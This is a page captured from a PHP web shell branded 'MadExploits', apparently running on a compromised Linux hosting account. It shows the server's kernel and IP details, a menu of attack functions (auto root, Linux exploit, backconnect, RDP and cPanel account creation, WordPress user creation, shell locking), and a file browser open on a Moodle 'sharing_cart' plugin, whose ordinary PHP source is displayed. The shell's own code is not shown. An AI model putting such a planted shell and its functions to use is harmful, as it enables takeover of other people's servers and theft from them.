Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.69.17.90
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
blocks /
sharing_cart /
[ HOME SHELL ]
Name
Size
Permission
Action
.github
[ DIR ]
drwxr-xr-x
amd
[ DIR ]
drwxr-xr-x
backup
[ DIR ]
drwxr-xr-x
classes
[ DIR ]
drwxr-xr-x
db
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
pix
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
.travis.yml
1.33
KB
-rw-r--r--
README.md
13.03
KB
-rw-r--r--
block_sharing_cart.php
7.47
KB
-rw-r--r--
bulkdelete.php
5.03
KB
-rw-r--r--
custom.css
3.78
KB
-rw-r--r--
lib.php
1.16
KB
-rw-r--r--
rest.php
4.65
KB
-rw-r--r--
restore.php
4.36
KB
-rw-r--r--
script.js
42.2
KB
-rw-r--r--
settings.php
2.3
KB
-rw-r--r--
styles.css
2.71
KB
-rw-r--r--
version.php
1.12
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : block_sharing_cart.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * Sharing Cart block * * @package block_sharing_cart * @copyright 2021 (C) Don Hinkelman and others * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ use block_sharing_cart\controller; use block_sharing_cart\section; defined('MOODLE_INTERNAL') || die(); /** * PTODO / TODO: See list below * - Namespaces are wrong (sharing_cart => block_sharing_cart) for autoload * - JS must be AMD modules * - Remove require statements and use autoload * - Create new branches and implement mustache / renderers (some already exists) * - Fix version variable in contructor * - Move all exceptions to classes/exceptions and create descriptive classes * - Implement Core/Str to load language strings * * Class block_sharing_cart */ class block_sharing_cart extends block_base { public function init(): void { $this->title = get_string('pluginname', __CLASS__); } public function applicable_formats(): array { return array( 'all' => false, 'course' => true, 'site' => true ); } public function has_config(): bool { return true; } /** * Get the block content * * @return object|string * * @throws coding_exception * @throws dml_exception|moodle_exception * @global object $USER */ public function get_content() { global $USER, $COURSE, $PAGE; $section_id = optional_param('section', 0, PARAM_INT); $context = context_course::instance($this->page->course->id); if ($this->content !== null) { return $this->content; } if (!$this->page->user_is_editing() || !has_capability('moodle/backup:backupactivity', $context)) { return $this->content = ''; } $controller = new controller(); $html = $controller->render_tree($USER->id); $controller->delete_unused_sections($this->page->course->id); // Fetching all sections for current course. $sectionsHandler = new section(); $sections = $sectionsHandler->all($COURSE->id); /* Place the <noscript> tag to give out an error message if JavaScript is not enabled in the browser. * Adding bootstrap classes to show colored info in bootstrap based themes. */ $noscript = html_writer::tag('noscript', html_writer::tag('div', get_string('requirejs', __CLASS__), array('class' => 'error alert alert-danger')) ); $html = $noscript . $html; $this->page->requires->css('/blocks/sharing_cart/styles.css'); if ($this->is_special_version()) { $this->page->requires->css('/blocks/sharing_cart/custom.css'); } $this->page->requires->jquery(); $this->page->requires->js_call_amd('block_sharing_cart/script', 'init', ['add_method' => get_config('block_sharing_cart', 'add_to_sharing_cart')]); $this->page->requires->strings_for_js( ['yes', 'no', 'ok', 'cancel', 'error', 'edit', 'move', 'delete', 'movehere'], 'moodle' ); $this->page->requires->strings_for_js( [ 'copyhere', 'notarget', 'backup', 'restore', 'movedir', 'clipboard', 'confirm_backup', 'confirm_backup_section', 'confirm_userdata', 'confirm_delete', 'clicktomove', 'folder_string', 'activity_string', 'delete_folder', 'modal_checkbox', 'modal_confirm_backup', 'modal_confirm_delete', 'backup_heavy_load_warning_message', 'drop_here', ], __CLASS__ ); $footer = ''; $page_format = $PAGE->course->format; // Check if page format is not site. (Location) if ($page_format !== 'site'){ // Creating with sections that are not empty. $sections_dropdown = ''; foreach ($sections as $section) { $sectionname = $section->name; if ($section->sequence !== '') { if (!$section->name) { $sectionname = get_string('sectionname', "format_$COURSE->format") . ' ' . $section->section; } $sections_dropdown .= " <option data-section-id='$section->id' data-section-number='$section->section' data-course-id='$section->course' data-section-name='$sectionname'> $sectionname </option> "; } } $footer = " <form id=\"copy-section-form\" data-in-section=\"" . ($section_id ? 1 : 0) . "\"> <select class='custom-select section-dropdown'> $sections_dropdown </select> <a href='javascript:void(0)' class='copy_section' title='".get_string('copy_section_title', __CLASS__)."'> <input id='copy' type='button' class='btn btn-primary' value='" . get_string('copy_section', __CLASS__) . "'> </a> </form> "; } $footer .= ' <div style="display:none;"> <div class="header-commands">' . $this->get_header() . '</div> </div> '; return $this->content = (object) array('text' => $html, 'footer' => $footer); } /** * Get the block header * * @return string * @throws coding_exception * @throws moodle_exception */ private function get_header(): string { // link to bulkdelete $alt = get_string('bulkdelete', __CLASS__); $url = new moodle_url('/blocks/sharing_cart/bulkdelete.php', array('course' => $this->page->course->id)); return $this->get_bulk_delete($alt, $url) . $this->get_help_icon(); } /** * Get bulk delete * * @param string $alt * @param moodle_url $url * @return string */ private function get_bulk_delete(string $alt, moodle_url $url): string { return ' <a class="editing_bulkdelete" title="' . s($alt) . '" href="' . s($url) . '"> <i class="bulk-icon icon fa fa-times-circle" alt="' . s($alt) . '" /></i> </a> '; } /** * Get help icon * * @return string */ private function get_help_icon(): string { global $OUTPUT; $helpicon = $OUTPUT->help_icon('sharing_cart', __CLASS__); $helpicon = str_replace('class="', 'class="help-icon ', $helpicon); return $helpicon; } /** * Check Moodle 3.2 or later * * @return boolean */ private function is_special_version(): bool { return version_compare(moodle_major_version(), '3.2') === 1; } }
Close